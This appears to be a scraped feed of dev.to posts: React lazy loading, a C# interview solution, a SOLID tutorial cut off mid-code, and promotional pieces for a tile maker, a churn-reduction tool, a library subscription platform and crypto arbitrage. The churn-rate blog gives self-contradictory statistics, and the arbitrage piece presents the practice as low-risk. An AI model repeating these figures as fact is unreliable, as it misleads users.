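  static getDerivedStateFromError() {
    // Switch to the fallback UI on the next render.
    return { hasError: true };
  }

  render() {
    return this.state.hasError ? this.props.fallback : this.props.children;
  }
}
```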
roggc
1,912,186
10 Facts About ReactJS Lazy Loading: Optimizing Your Web Application's Performance
Lazy loading in ReactJS is an essential technique for enhancing the performance of web applications...
0
2024-07-05T04:13:53
https://dev.to/vyan/10-facts-about-reactjs-lazy-loading-optimizing-your-web-applications-performance-13ck
webdev, javascript, react, beginners
Lazy loading in ReactJS is an essential technique for enhancing the performance of web applications by loading components only when needed. This approach ensures a smoother user experience and more efficient use of resources. Here are ten intriguing facts about ReactJS lazy loading, explained with engaging analogies to make them easy to understand. ## Fact 1: Lazy Loading in React is Like a Library with Books Imagine you have a vast library of books at home. When you leave the house, you don't need to carry all the books with you; you only take the ones you need at the moment. Similarly, in React, lazy loading means you only load the components you need when you need them. This helps reduce the initial load time of your application, making it faster and more efficient. ## Fact 2: React.lazy is Like a Special Key That Unlocks the Bookshelf React provides a function called `React.lazy`, which acts like a special key that unlocks the bookshelf. This function allows you to specify which components should be loaded lazily. By using `React.lazy`, you can defer the loading of a component until it is actually needed in the application. ```javascript const LazyComponent = React.lazy(() => import('./LazyComponent')); ``` ## Fact 3: The Loader Function is Like a Librarian Who Fetches the Book for You The loader function in `React.lazy` is akin to a librarian who fetches the book for you. It’s a function that returns a promise which resolves to the component that should be loaded lazily. This ensures that the component is only fetched when required. ```javascript const LazyComponent = React.lazy(() => import('./LazyComponent')); ``` ## Fact 4: The Loader Function Can Be Like a Complex Search Algorithm Imagine the librarian using a complex search algorithm to find the book you're looking for in a vast library. Similarly, the loader function in React can perform complex operations, such as making API calls or fetching resources, to retrieve the component. ## Fact 5: When React Needs the Component, It’s Like Asking the Librarian to Fetch the Book When React needs to render the component, it’s like asking the librarian to fetch the book. React calls the loader function, waits for the promise to resolve, and then renders the component. This ensures that the component is available just in time for its use. ```javascript const LazyComponent = React.lazy(() => import('./LazyComponent')); function App() { return ( <React.Suspense fallback={<div>Loading...</div>}> <LazyComponent /> </React.Suspense> ); } ``` ## Fact 6: Lazy Loading Can Be Used Like a Personalized Book Recommendation Service Lazy loading can be dynamically controlled based on user interactions or other conditions. This is similar to a personalized book recommendation service where you get suggestions based on your preferences. You can load components dynamically to enhance the user experience. ## Fact 7: Lazy Loading Can Be Used Like a Background Task Lazy loading can be executed as a background task, similar to how background tasks run while you're doing something else. This ensures that components are loaded asynchronously without blocking the main thread, improving the overall performance of the application. ## Fact 8: Wrapping a Component in Suspense is Like Putting a Bookmark in the Book To handle lazy-loaded components properly, you wrap them in `React.Suspense`. This is like putting a bookmark in a book to ensure you don’t lose your place. `React.Suspense` provides a fallback UI while the component is being loaded. 
```javascript function App() { return ( <React.Suspense fallback={<div>Loading...</div>}> <LazyComponent /> </React.Suspense> ); } ``` ## Fact 9: React.Suspense is Like a Special Waiting Area `React.Suspense` acts like a special waiting area where you can wait for your book to arrive. It handles the loading state and renders a fallback component until the lazy-loaded component is ready. This ensures a seamless user experience. ## Fact 10: Using Lazy Loading with Other React Features is Like Having a Personal Book Concierge Service Combining lazy loading with other React features is like having a personal book concierge service. It optimizes your application for better performance and scalability, ensuring that your app runs smoothly even as it grows in complexity. ## Conclusion Lazy loading in ReactJS is a powerful technique for improving the performance and efficiency of your web applications. By understanding and leveraging these ten facts, you can optimize your React applications to provide a better user experience and handle resources more effectively. Whether you're just starting with React or looking to refine your existing skills, implementing lazy loading is a step towards creating faster, more responsive web applications.
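To make Fact 6 concrete, here is a small hedged sketch (not from the original article) of loading a component only after a user interaction, in this case a button click; `./Chart` is a hypothetical module used purely for illustration.

```javascript
import React, { useState, Suspense, lazy } from 'react';

// The chart bundle is only fetched after the user asks for it.
const LazyChart = lazy(() => import('./Chart'));

export default function Dashboard() {
  const [showChart, setShowChart] = useState(false);

  return (
    <div>
      <button onClick={() => setShowChart(true)}>Show chart</button>
      {showChart && (
        <Suspense fallback={<div>Loading chart...</div>}>
          <LazyChart />
        </Suspense>
      )}
    </div>
  );
}
```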
vyan
1,912,185
Master Minimize Maximum Difference in an Array in C# in 3 Easy Steps
In intermediate-level interviews, candidates are frequently challenged with the task of reducing the...
0
2024-07-05T04:13:11
https://dev.to/rk042/master-minimize-maximum-difference-in-an-array-in-c-by-3-easy-steps-4pai
programming, interview, career, algorithms
In intermediate-level interviews, candidates are frequently challenged with the task of reducing the disparity between the largest and smallest values in an array. You may come across questions asking you to 'minimise the max-min difference,' 'reduce array difference,' or 'achieve optimal array transformation' in C#. Regardless of how the problem is phrased, the central concept remains unchanged: making strategic moves to minimise the gap between the highest and lowest values in an array. ![Learn how to minimize maximum difference in an array using C# with a step-by-step guide. Ideal for programming interviews.](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2ugcxzy6knq0zapzjky6.jpg) Don't miss out—explore these tips before your interview! [Find the largest sum subarray using Kadanes Algorithm](https://interviewspreparation.com/finding-the-largest-sum-subarray-using-kadanes-algorithm/) [Mastering Object-Oriented Programming in C++](https://interviewspreparation.com/understanding-object-oriented-programming-oop-in-cpp/) [Palindrome Partitioning A Comprehensive Guide](https://interviewspreparation.com/palindrome-partitioning-a-comprehensive-guide/) [what is parameter in coding and what is the deference between param and argument in programming] (https://interviewspreparation.com/what-is-a-parameter-in-programming/) [how to inverse a matrix in c#](https://interviewspreparation.com/how-to-inverse-a-matrix-in-csharp/) [find the first occurrence of a string](https://interviewspreparation.com/find-the-first-occurrence-of-a-string/) [Longest common substring without repeating characters solution](https://interviewspreparation.com/longest-common-substring-without-repeating-characters/), [Function Overloading in C++](https://interviewspreparation.com/function-overloading-in-cpp/), [Two Sum LeetCode solution in C#](https://interviewspreparation.com/two-sum-leetcode-solution/) [Method Overloading vs. Method Overriding in C#](https://interviewspreparation.com/method-overloading-vs-method-overriding-in-csharp-interviews/) ## Understanding the Problem As the title suggests, the interviewer will present an array and ask you to perform a series of moves to reduce the difference between the largest and smallest values in the array. Occasionally, they might permit up to three moves to change any element to any value in the array by using the Minimize Maximum Difference technique. The objective is to achieve the smallest possible difference. For example, consider the array nums = [1, 5, 0, 10, 14]. With three moves, you can alter the values to minimise the maximum difference. This task can initially seem challenging, but we will break it down step by step. In the next section, I will provide a real-world example of minimising the maximum difference in an array. [Follow Original page for real-world example with Logical Approach to Minimize Maximum Difference in Array](https://interviewspreparation.com/minimize-maximum-difference-in-array/) ## C# Program to Minimize Maximum Difference in Three Moves ``` using System; using System.Linq; //program by interviewspreparation.com public class MinimizeDifference { public static int MinDifference(int[] nums) { if (nums.Length <= 4) return 0; Array.Sort(nums); return Math.Min(nums[nums.Length - 4] - nums[0], Math.Min(nums[nums.Length - 3] - nums[1], Math.Min(nums[nums.Length - 2] - nums[2], nums[nums.Length - 1] - nums[3]))); } } ``` In summary, minimizing the difference between the largest and smallest values in an array after three moves involves: 1. 
Sorting the array. 2. Calculating the differences for each of the four possible scenarios. 3. Selecting the minimum difference from these scenarios. By following these steps, you can effectively reduce the difference in an array using C#.
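As a quick sanity check (not part of the original post), calling `MinDifference` on the example array from the problem statement, `[1, 5, 0, 10, 14]`, returns `1`: after sorting, the cheapest of the four scenarios keeps `0` and `1` and spends the three moves on `5`, `10`, and `14`. A minimal usage sketch, assuming the `MinimizeDifference` class above is compiled in the same project:

```csharp
using System;

public class Program
{
    public static void Main()
    {
        int[] nums = { 1, 5, 0, 10, 14 };

        // Keep 0 and 1, change the three largest values: max - min becomes 1.
        Console.WriteLine(MinimizeDifference.MinDifference(nums)); // prints 1
    }
}
```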
rk042
1,912,184
Lioli Ceramica
Powered by innovation and advanced technology, Lioli has swiftly become a leading porcelain tile...
0
2024-07-05T04:01:39
https://dev.to/lioli_ceramica/lioli-ceramica-4k9b
Powered by innovation and advanced technology, [Lioli](https://www.lioliceramica.com/) has swiftly become a leading porcelain tile company in India, gaining international recognition. In just four years, we have established ourselves as one of the most reliable [porcelain slab manufacturers](https://www.lioliceramica.com/about-lioli-ceramica/) globally, renowned for our high-quality products and exceptional customer service to clients and partners worldwide. Our expertise in delivering exceptional slab solutions with world-class technology has made Lioli a trailblazer in producing [1600*3200mm porcelain slabs](https://www.lioliceramica.com/product/sizes) in India. Inspired by the beauty of nature, we offer superior alternatives to marble slabs through a blend of design and excellent craftsmanship. With a daily production capacity of 13,000 sq. meters, we are a globally recognized slab tile manufacturer based in Morbi, setting industry benchmarks with our unmatched porcelain slabs, ideal for both traditional and modern architectural, furnishing, and design uses. Lioli caters to all your architectural needs with state-of-the-art porcelain slabs designed to bring a majestic touch to any space. Website - https://www.lioliceramica.com/ Facebook - [https://www.facebook.com/lioliceramicapvtltd/](https://www.facebook.com/lioliceramicapvtltd/) Instagram - [https://www.instagram.com/lioliceramicaofficial/](https://www.instagram.com/lioliceramicaofficial/) Linkedin - [https://www.linkedin.com/company/lioli-ceramica-pvt-ltd/](https://www.linkedin.com/company/lioli-ceramica-pvt-ltd/) Youtube - [https://www.youtube.com/@Lioliceramica](https://www.youtube.com/@Lioliceramica)
lioli_ceramica
1,912,183
Average Churn Rate for Subscription Services in 2024
This Blog was Originally Posted to Churnfree Blog The average churn rate for subscription services...
0
2024-07-05T03:58:00
https://churnfree.com/blog/average-churn-rate-for-subscription-services
churnrate, saaschurn, customerchurnrate, churnfree
**This Blog was Originally Posted to [Churnfree Blog](https://churnfree.com/blog/average-churn-rate-for-subscription-services/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution)** The average churn rate for subscription services varies from industry to industry. Understanding the average churn rate for subscription services is essential for any business to grow in 2024. Reaching the average churn rate for subscription services can be tricky, but you can reduce subscription churn with some simple churn retention strategies. The churn rate is the percentage of customers who discontinue their subscriptions within a specific time frame. It’s often measured in terms of monthly recurring revenue (MRR) and annual recurring revenue (ARR), key financial metrics for subscription-based businesses. The average annual churn rate for subscription companies typically ranges between 5-7%. A monthly average churn rate for subscription services is around 4%. However, these figures can vary depending on industry and market conditions. You can compare these average [churn rate benchmarks](https://churnfree.com/blog/b2b-saas-churn-rate-benchmarks/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution) against your own gauge to see where your business stands. **Exploring Average Churn Rate for Subscription Services by Industry** Different industries experience varying levels of churn, influenced by factors like customer engagement, pricing strategies, and market saturation. Let’s explore average churn rate for subscription services in different industries: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2027zl8z1z2pim9lx5ye.png) **SaaS Subscription Services** According to Recurly, the average churn rate for SaaS is 3.36% for voluntary churn. SaaS is a B2B service and, therefore, has lower churn rates. The SaaS sector shows significant variance in [SaaS churn rate](https://churnfree.com/blog/b2b-saas-churn-rate-benchmarks/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution), with B2B platforms typically experiencing lower churn rates, around 3.5% to 4.67%, compared to B2C platforms. This difference is often due to the critical nature of B2B services and the long-term contracts commonly associated with them. **Related Read: [What is a good churn rate for SaaS?](What is a good churn rate for SaaS?)** **Consumer-Oriented Services** Direct-to-consumer (DTC) businesses usually have higher average subscription churn rates. Media and Entertainment, Consumer Goods, and Retail reports tend to have higher [customer churn rate](https://churnfree.com/blog/a-look-at-customer-churn-rate/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution). Industries such as Digital Media, Entertainment, Consumer Goods, and Retail report an average churn rate of around 6.5%. This is relatively high compared to SaaS churn rates, which average about 3.8%. **Energy/Utilities** In the Energy/Utilities sector, the average churn rate for subscription services stands at approximately 11%. This figure underscores the importance of businesses in this sector focusing on customer retention strategies, especially considering the competitive nature of the energy market. **IT Services** The IT Services industry shows a lower churn rate, around 12%. This relatively lower rate can be attributed to the indispensable nature of IT services for businesses, which often leads to longer contract durations and higher customer retention. 
**Computer Software** The Computer Software industry experiences an average churn rate of about 14%. Despite the essential role of software in modern business operations, the competitive market and rapid technological advancements contribute to this churn rate. **Professional Services** Professional Services face a higher churn rate, averaging 27%. This sector’s high rate can be linked to the need for personalized service delivery and the intense competition among firms offering these services. **Clothing Subscription Box** Clothing Subscription Box Churn Rates, similar to fashion subscription services, often see high churn rates. The average clothing subscription services have churn rates of around 10.54% per month due to fluctuating consumer interests and a competitive market. **News Subscriptions** News subscriptions face challenges in maintaining subscribers, especially in an era where free content is readily accessible. Factors like content quality, pricing, and the proliferation of alternative news sources widely influence the churn rate in this niche. **E-commerce Subscriptions** As reported by e-commerce platforms, including Shopify, the average churn rate of e-commerce subscriptions is around 5%. **Streaming Services** The average churn rates for streaming services like Netflix, Amazon Prime, Disney, etc., are reported to be high. In the US, streaming services had a churn rate of around 37% for the second half of 2022. The churn rate was significantly higher with Generation Z and millennials than with boomers and Gen X. **Factors Influencing Subscription Churn** Pricing is one of the main [causes of churn](https://churnfree.com/blog/analyze-customer-churn-causes/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution). According to a survey, approximately 71% of the customers unsubscribed because of high pricing or an increase in pricing. Other than that, most sign ups never turn into upgrades due to hidden charges, such as additional fees for premium features or unexpected price increases after a trial period, which causes customers to churn. This can be resolved by creating a transparent pricing calculator and responding to churn. **Monitoring and Responding to Churn** It is essential for subscription businesses to monitor their churn rates closely and understand the underlying reasons. Even slight increases in churn can indicate potential issues that need immediate attention to retain customers and sustain growth. By utilizing a [churn prediction software](https://churnfree.com/blog/churn-prediction-software/), you can confidently predict churn and implement effective strategies to avoid high churn rates, ensuring the security and stability of your business. The average subscription churn rate can serve as a critical metric for the health of a subscription-based business. Keeping this rate at or below industry benchmarks is essential for the long-term sustainability of a business. By delving into these industry-specific churn rates, businesses can gain a comprehensive understanding of the factors that drive customer turnover. This will help you in building strong [customer retention strategies](https://churnfree.com/blog/customer-retention-strategies/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution), thereby reducing customer churn and achieving [net negative churn](https://churnfree.com/blog/net-negative-churn/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution). 
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7exwrfqruj2euinui4sp.png) If you feel like this lady after looking at the average churn rates by industry, don’t worry: [Churnfree](https://churnfree.com/) can help you reduce churn by 40%. Just sign up and find out for yourself. If you’d like to learn more about churn rate and various tricks to [reduce customer churn](https://churnfree.com/blog/how-to-reduce-customer-churn/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution), follow the [Churnfree Blog](https://churnfree.blog/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution). **FAQs** **What is the typical churn rate for subscription-based businesses in 2024?** The typical churn rate for subscription services generally falls between 6-8%. However, businesses can strive to push their churn rate below this average. Understanding why customers cancel their subscriptions and how to calculate your company’s churn rate is crucial to making that improvement. **What are typical churn rates for digital subscriptions?** Digital subscription companies generally see an average annual churn rate of 5-7%. A monthly churn rate of 4% is often considered adequate. However, these rates can vary depending on the specific market and industry, so it is beneficial to look at industry benchmarks to evaluate your business’s performance. **How is the retention rate for a subscription service determined?** The retention rate of a subscription service is determined by the percentage of users who continue to use the service over a given period, such as weekly or monthly. This rate is a critical metric for assessing [customer loyalty](https://churnfree.com/blog/customer-loyalty/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution). Additionally, Monthly Recurring Revenue (MRR) retention, which tracks the stability of revenue from recurring subscriptions over time, is another important metric to consider.
churnfree
1,912,182
Unlocking the Future of Library Subscription Services with gylyb
In today’s digital age, library subscription services are evolving rapidly, and libraries everywhere...
0
2024-07-05T03:46:46
https://dev.to/gylyb/unlocking-the-future-of-library-subscription-services-with-gylyb-46go
In today’s digital age, library subscription services are evolving rapidly, and libraries everywhere are feeling the shift. From academic libraries to public and research-focused institutions, there’s a growing demand for digital resources that are both comprehensive and up-to-date. This is where gylyb comes in — a platform designed to transform how library subscription services are promoted and managed. **<u>The Changing Landscape of Library Subscription Services</u>** Library subscription services are now the cornerstone of modern libraries. They offer access to a vast array of digital content, including e-books, journals, databases, and multimedia resources. This wealth of information ensures that libraries can meet the diverse needs of their patrons. But with this growth comes complexity. Identifying the right products, negotiating terms, and tracking usage can be challenging. gylyb is here to simplify this process. **<u>gylyb: Bridging the Gap in Library Subscription Services</u>** gylyb, short for “Get Your Library-Your Bridge,” is revolutionizing the way libraries and entrepreneurs interact with subscription services. It’s a unified platform where publishers can post their products, and entrepreneurs, known as InflueNeurs, can promote these products to institutions, particularly libraries. gylyb makes managing and promoting library subscription services straightforward and efficient for everyone involved. **<u>Here’s how gylyb is making a difference:</u>** **1. Centralized Platform for Product Exploration:—** gylyb provides a centralized platform for publishers to upload their subscription-based products. Libraries can browse a wide range of offerings, from academic journals to multimedia databases, all in one place. **2. Empowering InflueNeurs:—** gylyb empowers individuals with strong institutional networks to become InflueNeurs. These entrepreneurs can choose products they believe in, obtain necessary certifications, and promote these products to their contacts within libraries. **3. Simplified Negotiations:—** Negotiating terms for library subscription services can be daunting. gylyb simplifies this process by providing a clear framework for negotiations, ensuring that both libraries and publishers can agree on terms efficiently and transparently. **4. Effortless Tracking and Management:— **gylyb’s built-in CRM system allows InflueNeurs and libraries to track subscription statuses, manage renewals, and monitor usage seamlessly. This ensures that libraries can keep their subscriptions up-to-date and relevant to their patrons’ needs. **5. Transparent Commission System:—** InflueNeurs earn commissions for promoting library subscription services. gylyb ensures that the commission process is transparent and timely, fostering trust and motivation among InflueNeurs. **<u>The Benefits of Using gylyb for Library Subscription Services</u>** **- Access to Diverse Products:—** Libraries can access a diverse range of subscription services through gylyb, ensuring they have the resources needed to meet their patrons’ demands. **- Enhanced Efficiency:—** By centralizing product exploration, negotiation, and management, gylyb enhances the efficiency of managing library subscriptions, saving time and effort for library staff. **- Empowered Entrepreneurs:—** gylyb provides a unique opportunity for entrepreneurs to leverage their influence and networks to promote library subscription services, creating a win-win scenario for both libraries and InflueNeurs. 
**- Transparency and Trust:—** gylyb’s transparent processes build trust among all stakeholders, ensuring fair dealings and timely payments. **<u>Conclusion: Join the gylyb Revolution</u>** As the demand for digital resources continues to grow, the need for efficient and effective library subscription services becomes more critical. gylyb is at the forefront of this revolution, offering a platform that bridges the gap between publishers, libraries, and entrepreneurs. By simplifying the promotion, negotiation, and management of library subscriptions, gylyb ensures that libraries can provide top-notch resources to their patrons while empowering entrepreneurs to thrive. Join the gylyb revolution today and discover how we can transform the way you manage and promote library subscription services. Get Your Library-Your Bridge with gylyb and unlock a world of possibilities.
gylyb
1,912,181
Crypto Arbitrage: A Comprehensive Guide
Introduction Cryptocurrency has revolutionized the financial landscape, offering a...
27,673
2024-07-05T03:45:12
https://dev.to/rapidinnovation/crypto-arbitrage-a-comprehensive-guide-4cck
## Introduction Cryptocurrency has revolutionized the financial landscape, offering a new dimension of digital assets that are decentralized and often volatile. This new financial ecosystem has given rise to various trading strategies, one of which is arbitrage. Arbitrage involves capitalizing on price differences of the same asset across different markets or platforms. ## What is Crypto Arbitrage? Crypto arbitrage is a financial strategy that involves buying a cryptocurrency on one exchange where the price is low and simultaneously selling it on another exchange where the price is higher. This exploits the price differences across different platforms to make a profit. ## Types of Crypto Arbitrage There are several types of crypto arbitrage strategies: ### Spatial Arbitrage Involves buying a cryptocurrency on one exchange where the price is low and selling it on another exchange where the price is higher. ### Triangular Arbitrage Involves trading discrepancies between three currencies on the same exchange. ### Statistical Arbitrage Employs time series analysis, statistical methods, and computational algorithms to capitalize on pricing inefficiencies between securities. ## How to Identify Arbitrage Opportunities Identifying arbitrage opportunities requires a keen eye for detail, a deep understanding of market mechanisms, and the right tools to spot price discrepancies that can be exploited for profit. ## Benefits of Crypto Arbitrage ### Profit Potential in Volatile Markets In volatile markets, the price discrepancies between exchanges can widen significantly, thus increasing the potential profit margin for arbitrage strategies. ### Risk Mitigation Through Arbitrage Arbitrage is considered a relatively low-risk way to profit from the volatile crypto markets by minimizing the time held in the asset. ## Challenges in Crypto Arbitrage ### Transaction Speed and Timing The success of an arbitrage strategy often hinges on the ability to execute transactions swiftly. ### Fees and Costs Impacting Profitability Understanding various fees is crucial for anyone considering this investment strategy. ### Regulatory and Legal Considerations The regulatory and legal landscape for cryptocurrency can impact the viability of crypto arbitrage strategies. ## Real-World Examples of Successful Crypto Arbitrage ### Case Study 1: Spatial Arbitrage Between Two Major Exchanges Involves taking advantage of the price differences for the same asset on different exchanges. ### Case Study 2: Triangular Arbitrage Within a Single Exchange Involves trading three different currencies within the same exchange to exploit discrepancies in their relative prices. ## Conclusion ### Summary of Crypto Arbitrage Trading Crypto arbitrage trading involves capitalizing on the price differences of cryptocurrencies across various exchanges. This strategy can be particularly lucrative due to the volatile nature of cryptocurrency markets. ### Final Thoughts on Maximizing ROI Through Arbitrage Maximizing ROI through crypto arbitrage requires strategic planning, technological assistance, and continuous market analysis. By understanding the intricacies of the market and utilizing technology to its fullest potential, traders can maximize their ROI and succeed in the competitive world of cryptocurrency trading. 📣📣Drive innovation with intelligent AI and secure blockchain technology! Check out how we can help your business grow! 
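As a concrete illustration of the spatial arbitrage strategy described above, here is a minimal TypeScript sketch that checks whether a price gap between two venues is still profitable after trading fees. The exchange names, fee rates, and the `spatialArbitrage` helper are hypothetical simplifications: real arbitrage must also account for slippage, transfer time, and withdrawal limits.

```ts
interface Quote {
  exchange: string;
  price: number;   // price of the asset in USD
  feeRate: number; // taker fee as a fraction, e.g. 0.001 = 0.1%
}

// Estimated profit (in USD) of buying `qty` units on the cheaper venue and
// selling on the dearer one, or null if the spread does not cover the fees.
function spatialArbitrage(a: Quote, b: Quote, qty: number): number | null {
  const buy = a.price < b.price ? a : b;
  const sell = a.price < b.price ? b : a;
  const cost = buy.price * qty * (1 + buy.feeRate);
  const proceeds = sell.price * qty * (1 - sell.feeRate);
  const profit = proceeds - cost;
  return profit > 0 ? profit : null;
}

// Hypothetical quotes for the same asset on two exchanges.
const quoteA: Quote = { exchange: "ExchangeA", price: 61850, feeRate: 0.001 };
const quoteB: Quote = { exchange: "ExchangeB", price: 62100, feeRate: 0.001 };

console.log(spatialArbitrage(quoteA, quoteB, 0.5)); // roughly 63 USD before transfer costs
```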
[Blockchain Development](https://www.rapidinnovation.io/service-development/blockchain-app-development-company-in-usa) [AI Development](https://www.rapidinnovation.io/ai-software-development-company-in-usa) ## URLs * <https://www.rapidinnovation.io/post/crypto-arbitrage-trading-opportunities-maximize-your-roi> ## Hashtags #CryptoArbitrage #BlockchainTechnology #TradingStrategies #MarketEfficiency #CryptoTrading
rapidinnovation
1,912,180
gylyb: Get Your Library - Your Bridge
gylyb: Get Your Library - Your Bridge is a platform designed to help individuals in the library...
0
2024-07-05T03:44:40
https://dev.to/gylyb/gylyb-get-your-library-your-bridge-pnn
gylyb: Get Your Library - Your Bridge is a platform designed to help individuals in the library industry boost their earnings by recommending products and services for institutional purchases and subscriptions. We support InflueNeurs – individuals with a blend of influence and entrepreneurship – to turn their networks into successful businesses while maintaining a strong commitment to privacy. Join us in transforming your influence into a thriving business and making a positive impact on the library community. Visit Here : https://www.gylyb.com Email : [email protected] Contact : +91 7905201031 Youtube : https://www.youtube.com/@gylybbox Twitter : https://twitter.com/BoxGylyb Linkedin : https://www.linkedin.com/in/gylyb-get-your-library-your-bridge-44b810307/ Facebook : https://www.facebook.com/profile.php?id=61551255364591&mibextid=LQQJ4d&rdid=nrD59zxhhH0kUgKq Instagram : https://www.instagram.com/boxgylyb/?igsh=d2o2NWZsOHpyeDIy
gylyb
1,912,178
Ok
Jajajajajw
0
2024-07-05T03:39:12
https://dev.to/alexgrace012/ok-62j
Jajajajajw
alexgrace012
1,911,178
Explanation of SOLID in OOP
Introduction SOLID is a set of five fundamental principles that support enhancing...
27,954
2024-07-05T03:00:00
https://howtodevez.blogspot.com/2024/04/explanation-of-solid-in-oop.html
programming, javascript, typescript, beginners
Introduction ------------ **SOLID** is a set of five fundamental principles that support enhancing maintainability and ease of extension for future software development. Introduced by software engineer Robert C. Martin, also known as "Uncle Bob," in the book "Design Principles and Design Patterns," the SOLID principles include: * S - Single Responsibility Principle * O - Open/Closed Principle * L - Liskov Substitution Principle * I - Interface Segregation Principle * D - Dependency Inversion Principle Below, we'll provide detailed explanations and analysis for each principle. Note that the examples in this article are implemented using **TypeScript**, but you can rewrite them in other **object-oriented programming languages**. ![SOLID](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2wvg02725p8mh8dijnuh.png) 1\. Single Responsibility Principle (SRP) ----------------------------------------- **_A class should have one and only one reason to change, meaning that a class should have only one job._** This is considered the simplest and most crucial principle because it relates to most of the other principles. Simply put, when implementing a class/method, it should serve only one specific task. If it has more than one responsibility, it's advisable to split those responsibilities into multiple classes or methods. This practice benefits future maintenance, as when there's a need to modify the functionality of a class/method, we only need to make changes within that class/method without affecting others in the application. Below is an example illustrating a violation of this principle. ```ts class Car { name: string brand: string // format car info getCarInfoText() { return "Name: " + this.name + ". Brand: " + this.brand; } getCarInfoHTML() { return "<span>" + this.name + " " + this.brand + "</span>"; } getCarInfoJson() { return { name: this.name, brand: this.brand } } // store data saveToDatabase() { } saveToFile() { } } ``` Here's an example showing a violation of the **SRP** principle because the **Car** class has too many unrelated functions like formatting info and storing data. These functions should be split into different classes to make things clearer and reduce the complexity of the source code. ```ts // only car info class Car { name: string brand: string } // only use for format class Formatter { formatCarText(car: Car) { return 'Name: ' + car.name + '. Brand: ' + car.brand } formatCarHtml(car: Car) { return '<span>' + car.name + ' ' + car.brand + '</span>' } formatCarJson(car: Car) { return {name: car.name, brand: car.brand} } } // only use for store data class Store { saveToDatabase() {} saveToFile() {} } ``` 2\. Open/Closed Principle (OCP) ------------------------------- **_Objects or entities should be open for extension but closed for modification_** This principle means that a class should be designed in a way that allows new functionality to be added without altering its existing code. To achieve this, we can utilize inheritance, interfaces, or composition. 
```ts interface Shape { calculateArea(): number; } class Circle implements Shape { private radius: number; constructor(radius: number) { this.radius = radius; } calculateArea(): number { return Math.PI * this.radius * this.radius; } } class Rectangle implements Shape { private width: number; private height: number; constructor(width: number, height: number) { this.width = width; this.height = height; } calculateArea(): number { return this.width * this.height; } } ``` In the example above, the **Shape** interface defines a method called **_calculateArea_** used to calculate the area of a shape. Both the **Circle** and **Rectangle** classes, when implementing this interface, must define their own way of calculating the area for each shape. This implementation approach is beneficial for future extension. If we add more shapes in the future (such as triangles, quadrilaterals, etc.), we only need to implement the **Shape** interface similarly and define the method to calculate the area for each shape, without needing to modify the existing classes. This avoids disrupting the existing logic of the system. 3\. Liskov Substitution Principle (LSP) --------------------------------------- This principle was proposed by Barbara Liskov in 1987. Its essence is as follows: **_Let q(x) be a property provable about objects of x of type T. Then q(y) should be provable for objects y of type S where S is a subtype of T._** In simpler terms for object-oriented programming, the principle is understood as: **_Objects of a superclass should be replaceable with objects of its subclasses without affecting the correctness of the program._** Below is an example illustrating a violation of **LSP**. In reality, we know that a square is a type of rectangle with equal width and height. However, when implementing methods in the **Square** class that violate the behavior of the **Rectangle** class, it means that **LSP** is being violated. ```ts class Rectangle { height: number width: number setHeight(height: number) { this.height = height } setWidth(width: number) { this.width = width } calculateArea() { return this.height * this.width } } class Square extends Rectangle { // change behavior of super class setHeight(height: number) { this.height = height this.width = height } // change behavior of super class setWidth(width: number) { this.height = width this.width = width } } const rect = new Rectangle() rect.setHeight(10) rect.setWidth(5) console.log(rect.calculateArea()) // 5 * 10 const rect1 = new Square() rect1.setHeight(10) rect1.setWidth(5) console.log(rect1.calculateArea()) // result correct but break LSP ``` In this example, when the **Square** class implements the **_setWidth_** and **_setHeight_** methods from the **Rectangle** class, it violates the **LSP** because it changes both the width and height to be equal. To ensure that the program doesn't violate the **LSP**, it's better to create a parent class, such as the **Shape** class, and then have both **Square** and **Rectangle** inherit from that class. ### Additional Note This principle is highly abstract and prone to violation if you don't fully understand the concept. In **object-oriented programming**, we often build classes based on real-life concepts and objects, such as "a square is a type of rectangle" or "a penguin is a bird." However, you can't directly translate these relationships into source code. Remember, "**_In real life, A is B (a square is a rectangle), but it doesn't necessarily mean that class A should inherit from class B. 
Class A should only inherit from class B if class A can substitute for class B._**" 4\. Interface Segregation Principle (ISP) ----------------------------------------- **_A client should never be forced to implement an interface that it doesn’t use, or clients shouldn’t be forced to depend on methods they do not use._** The ISP encourages breaking down interfaces into smaller parts so that classes don't have to implement unrelated methods. This helps reduce dependency on unnecessary methods and makes the source code more flexible, easier to extend, and maintain. Here's an example of a violation of the ISP: ```ts interface Animal { eat(): void swim(): void fly(): void } class Fish implements Animal { eat() {} swim() {} fly() { throw new Error('Fish can not fly') } } class Bird implements Animal { eat() {} swim() { throw new Error('Bird can not swim') } fly() {} } ``` Because the **Animal** interface has many methods, and some methods may not be applicable to certain species of animals. When the **Fish** and **Bird** classes implement the **Animal** interface, they have to implement all methods, including unnecessary ones. This leads to wasted effort and increases the complexity of the program unnecessarily. The solution is to split the **Animal** interface into smaller interfaces as follows: ```ts interface Animal { eat(): void } interface Bird { fly(): void } interface Fish { swim(): void } class Dog implements Animal { eat() {} } class Sparrow implements Animal, Bird { eat() {} fly() {} } class Swan implements Animal, Bird { eat() {} swim() {} fly() {} } ``` 5\. Dependency Inversion Principle (DIP) ---------------------------------------- **_Entities must depend on abstractions, not on concretions. It states that the high-level module must not depend on the low-level module, but they should depend on abstractions_** In simpler terms: * High-level modules should not rely on low-level modules; both should rely on abstractions. * Abstractions should not depend on details; details should depend on abstractions. Here's an example of creating a **DataExporter** class that allows exporting data based on the provided `Exporter` (either **ExcelExporter** or **PdfExporter**). The `export` method is defined in the **Exporter** interface, making it easy to create additional exporters for use without needing to change the current source code. ```ts interface Exporter { export(data): void } class ExcelExporter implements Exporter { export(data): void { console.log('Export excel', data) } } class PdfExporter implements Exporter { export(data): void { console.log('Export csv', data) } } class DataExporter { private exporter: Exporter constructor(exporter: Exporter) { this.exporter = exporter } async export(): Promise<void> { const data = await this.fetchData() this.exporter.export(data) } private async fetchData() { 